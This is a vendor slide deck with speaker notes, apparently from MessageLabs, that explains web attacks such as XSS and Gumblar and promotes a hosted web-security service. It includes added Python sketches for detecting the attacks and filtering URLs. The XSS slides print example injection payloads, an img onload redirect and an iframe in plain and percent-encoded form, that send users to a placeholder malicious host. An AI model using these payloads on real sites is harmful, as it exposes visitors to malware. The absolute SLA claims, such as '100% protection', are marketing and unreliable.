Anatomy of a Web Attack

Agenda
  • Challenges Corporations Face
  • Web Usage Statistics
  • Web Attacks
  • Solving the Problem
  • MessageLabs Services

The Challenge
The Acme corporation faces a common problem: they want to allow their users business and reasonable personal web access, but they want to make sure that they are protected against the common threats:
  • Productivity
  • Offensive Materials
  • Abuse of resources
  • Malware

Lots of websites
  • Average 2,465 new malware websites per day.

Why malware?
  • Monetize the attack.
  • Steal your credentials - bank theft / fraud
  • Steal your data – confidential data / fraud

Getting Web Malware
  • Bad Link
  • postcard.jpg.exe

Advertise It
  • Subvert a legitimate website
  • Adverts

Fake AV Advert

XSS Attack
User content:
  • No. Your wrong.
  • Duh! Its “you’re”.
  • I agree. <img src="/images/smiley.gif" onload="document.location='http://malicious/'">

XSS IFrame Attack
The injected markup in the search parameter:

    http://genuine/index.php?search="'>
    <iframe src="http://malicious"
    height="100%" width="100%">
    </iframe>

The same request with the markup percent-encoded:

    http://genuine/index.php?search="'>
    %3C%69%66%72%61%6D%65%20
    %73%72%63%3D%22%68%74%74
    %70%3A%2F%2F%6D%61%6C%69
    %63%69%6F%75%73%201C%20
    %0A%68%65%69%67%68%74%3D
    %201C%31%30%30%25%22%20
    %77%69%64%74%68%3D%201C
    %31%30%30%25%22%3E%0A%3C
    %2F%69%66%72%61%6D%65%3E%0A
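The two forms of the search URL above are the same request once decoded, so any check has to normalise before it inspects, and the page that reflects the term has to encode it on output. The following Python sketch is an added example, not part of the original slides: the function names are hypothetical, the sample URLs are constructed from the slide's placeholder hosts `genuine` and `malicious`, and the assumption is that the search term is reflected inside an HTML attribute.

```python
import html
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# Markup that has no place in a search term. Pattern matching is only a
# detection aid for logs and gateways; the fix is the output encoding below.
SUSPICIOUS = re.compile(
    r"<\s*(iframe|script|img|object|embed)\b|\bon\w+\s*=|javascript:", re.I
)
MAX_DECODE_ROUNDS = 3  # bounded, so a crafted value cannot loop forever


def normalise(value):
    """Percent-decode until the value stops changing (handles double encoding)."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_request(url):
    """Return (parameter, normalised value) pairs whose value carries markup."""
    hits = []
    # parse_qsl performs the first round of percent-decoding itself.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = normalise(value)
        if SUSPICIOUS.search(value):
            hits.append((name, value))
    return hits


def render_vulnerable(term):
    """The flawed pattern: the term is concatenated into an attribute as-is."""
    return '<input name="search" value="' + term + '">'


def render_escaped(term):
    """The corrected pattern: quotes and angle brackets become entities."""
    return '<input name="search" value="' + html.escape(term, quote=True) + '">'


# Constructed sample input, built from the markup shown on the slide.
PAYLOAD = '"\'><iframe src="http://malicious" height="100%" width="100%"></iframe>'
BASE = "http://genuine/index.php?search="
PLAIN_URL = BASE + PAYLOAD
ENCODED_URL = BASE + quote(PAYLOAD, safe="")
DOUBLE_ENCODED_URL = BASE + quote(quote(PAYLOAD, safe=""), safe="")
BENIGN_URL = BASE + "100%25+cotton+shirts"

if __name__ == "__main__":
    for url in (PLAIN_URL, ENCODED_URL, DOUBLE_ENCODED_URL, BENIGN_URL):
        print(len(flag_request(url)), url[:70])
    print(render_escaped(PAYLOAD))
```

All three encodings normalise to the same value, which is why a filter that only looks for a literal `<iframe` in the raw URL misses the encoded request.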
Web Malware
  • Malware
  • Malicious instructions
  • Browser / JS / Flash / PDF
  • Complete control
  • Victim
  • Bad Guy

Gumblar Lifecycle
  • User visits website with XSS exploit
  • User is forwarded to host serving malware
  • Malware installed (often Flash or PDF)
  • Malware steals website logins, forwards to hacker
  • Hacker logs into website, installs XSS exploit

Gumblar Prevalence
  • Up to 60% of all malicious web traffic is Gumblar.

How You Can Protect Yourself

Controlling the web
IT Management should first consider controlling the Web.
Policy engine includes:
  • Categorised URL database
  • MIME and file type lists
  • Time periods
  • User and group based policies
  • Customizable block messages
  • Controls HTTP and HTTPS

Building the policy
  • No access to travel, leisure and sport between 9am and 5pm
  • No access to sex, guns or drugs
  • No access to streaming audio and video (reduce bandwidth)
  • Only support can download executables
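The four rules above can be expressed against the policy-engine inputs listed on the previous slide (URL category, MIME and file type, time period, user group, block message). The following Python sketch is an added example, not MessageLabs code: the hostnames, the category table, the group names and every function and class name are constructed for illustration, and unlisted hosts are assumed to be allowed.

```python
from dataclasses import dataclass
from datetime import time
from pathlib import PurePosixPath
from typing import Optional

# Constructed stand-in for the categorised URL database.
URL_CATEGORIES = {
    "flights.example": "travel",
    "scores.example": "sport",
    "pistols.example": "guns",
    "radio.example": "streaming",
    "downloads.example": "business",
}
EXECUTABLE_MIME = frozenset({
    "application/x-msdownload",
    "application/vnd.microsoft.portable-executable",
})
EXECUTABLE_EXT = frozenset({".exe", ".scr", ".com", ".msi"})


@dataclass(frozen=True)
class Request:
    host: str
    path: str    # URL path without the query string
    mime: str    # Content-Type reported for the response
    group: str   # directory group of the requesting user
    at: time     # local time of the request


def is_executable(req):
    """True if the MIME type or the final file extension marks an executable.

    Only the last extension counts, so postcard.jpg.exe is treated as an
    executable even when the server labels it image/jpeg.
    """
    suffix = PurePosixPath(req.path).suffix.lower()
    return req.mime.lower() in EXECUTABLE_MIME or suffix in EXECUTABLE_EXT


@dataclass(frozen=True)
class Rule:
    message: str                             # customisable block message
    categories: frozenset = frozenset()      # URL categories this rule blocks
    executables: bool = False                # rule targets executable downloads
    window: Optional[tuple] = None           # (start, end) time period, end exclusive
    exempt_groups: frozenset = frozenset()   # groups the rule does not apply to

    def blocks(self, req):
        if req.group in self.exempt_groups:
            return False
        if self.window and not (self.window[0] <= req.at < self.window[1]):
            return False
        if self.executables:
            return is_executable(req)
        category = URL_CATEGORIES.get(req.host.lower(), "uncategorised")
        return category in self.categories


POLICY = [
    Rule("Travel, leisure and sport sites are blocked between 9am and 5pm.",
         categories=frozenset({"travel", "leisure", "sport"}),
         window=(time(9), time(17))),
    Rule("This category is blocked at all times.",
         categories=frozenset({"sex", "guns", "drugs"})),
    Rule("Streaming audio and video is blocked to reduce bandwidth.",
         categories=frozenset({"streaming"})),
    Rule("Only the support group may download executables.",
         executables=True, exempt_groups=frozenset({"support"})),
]


def evaluate(req):
    """Return ("block", message) for the first matching rule, else ("allow", "")."""
    for rule in POLICY:
        if rule.blocks(req):
            return ("block", rule.message)
    return ("allow", "")


if __name__ == "__main__":
    card = Request("downloads.example", "/cards/postcard.jpg.exe",
                   "image/jpeg", "staff", time(12, 0))
    print(evaluate(card))
```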
Monitoring access
  • Dashboard – 1 year of high level information
  • Detailed reports up to 6 months of URL and Malware information
  • Customizable reports in PDF format
  • Scheduled reports sent directly to your inbox

Malware Protection
  • Scans HTTP and FTP/HTTP traffic
  • Multiple signature based AV engines
  • Skeptic technology
  • Customizable block messages
  • Converged analysis
  • No noticeable latency

You have choices for Web Security

Why use a hosted service over hardware or software?

Why use MessageLabs Services?
Best Client and Technical Support
  • Global Support is 24/7/365 & included with the service
  • Support SLA protects your business
  • Always get a live person who speaks your language
  • Dedicated CSM team
Best Services
  • Award Winning
  • Analyst approved
  • Backed by strongest SLAs

Most Robust Global Infrastructure
  • Incorporating 14 data centers spanning four continents
  • Every data center is scalable and secured to the highest standards
  • Clustered high performance servers; each cluster has full redundancy within itself and all other hardware is duplicated

Best Service Level Agreements
Web / Email / Archiving / Support
  • Anti-Virus Protection: 100% protection from known and unknown email viruses. Credit is offered if a client is infected by a virus.
  • Anti-Virus Protection: 100% protection against known viruses. Credit is offered if a client is infected by a virus.
  • Latency: Average scanning time of 100% of web content is within 100 milliseconds. Credit is offered if latency exceeds 100 milliseconds.
  • Virus False Positives: 0.0001% FP capture rate. Credit is offered if we do not meet this commitment.
  • Service Availability: 100% uptime. Credit is offered if availability falls below 100%. Client may terminate if availability falls below 95%.
  • Spam Capture Rate: 99% capture rate (95% for emails containing Asian characters). Credit is offered if we do not meet this commitment.
  • Service Availability Guarantee: 99.9% uptime for archiving network. Client may terminate if availability falls below 90%.
  • Spam False Positives: 0.0003% FP capture rate. Credit is offered if we do not meet this commitment.
  • Appliance Replacement Guarantee: If appliance fails during the warranty period, MessageLabs will repair or replace the appliance within 3 business days at no cost.
  • Latency: Average roundtrip time of 100% of email delivered in less than 60 seconds. Credit is offered if latency exceeds 1 minute.
  • Delivery: 100% delivery guarantee. Client may terminate if we do not meet this.
  • Technical support / Fault Response: critical - 95% calls within 2hrs; major - 85% calls within 4hrs; minor - 75% calls within 8hrs. Credit is offered if we do not meet this commitment.
  • Service Availability: 100% uptime. Credit is offered if availability falls below 100%. Client may terminate if availability falls below 95%.

Best Shared Intelligence
Accuracy, Reliability & Performance
The automatic sharing of knowledge gained in one protocol across all other protocols underpins MessageLabs Converged Threat Analysis. Security solutions that only focus on a single protocol such as email or web, or those that lack integration at the level of threat detection, may not sufficiently protect your business from malware and spyware designed to slip past single protocol security.

Q&A
  • Visit: www.MessageLabs.com
  • Phone: 866.460.0000
  • Email: Lrothman@MessageLabs.com

Editor's Notes

  1. Kelly: Welcome to today’s session Anatomy of a Web Attack. Today, we will review an increasingly sophisticated and hostile environment that exists in today's Internet. In the case of those looking to harm your business, you have several things to consider. Our speaker Lee Rothman will walk you through the various types of attacks, the reason we think malware exists through the Web and what you can do to protect your business. Lee Rothman joined Symantec Hosted Services in 2006 as the principal system engineer of North America. Lee joined the engineering team with 10 years of Internet and security experience, specializing in Internetworking. Prior to Symantec Hosted Services, Lee spent several years as a sales engineer for a large integrator and was product marketing manager for a large Fortune 500 company. Lee acts as a product expert in North America and aids the Sales, Product, and Marketing teams. Lee, can you please take us through today’s session?
  2. Today’s agenda is pretty simple. We are going to first go through the business challenges that companies face when it comes to the Web. I’ll then cover some statistics around the Web and how employees are using the Web in your organization. Finally, I will walk through a few examples of how attacks happen through the Internet. Finally, I will give some basic suggestions on how you can solve this problem.
  3. Let’s first explore the business challenge. Disclaimer, Acme is not a real company. In this example, the Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats. As a business, Acme is really looking to solve these four issues: Productivity, Offensive Materials, Abuse of resources, Malware. Most companies now face this challenge and are trying to manage this very real issue. Most companies haven’t really put a security issue in place because the security of the Web has not been an issue (or so they think) in their business. However, if we look at the data we can see some really compelling reasons why security for web should be considered.
  4. Now that we know why they do it, what are the ways in which they get introduced to a company? I’ve put these types of attacks into 5 categories: Bad Links, Advertising, XSS, Gumblar, Web Services. Let’s explore these categories in-depth.
  5. Second, IT Managers should consider putting policies in place.
  6. Third, IT Managers should consider monitoring their environments.
  7. Lastly, IT Managers should be sure they have malware protection in place that is effective.
  8. It’s important that we give a special thanks to our malware team in particular Martin Lee from our research and response team. Without his help, this webcast would not be possible.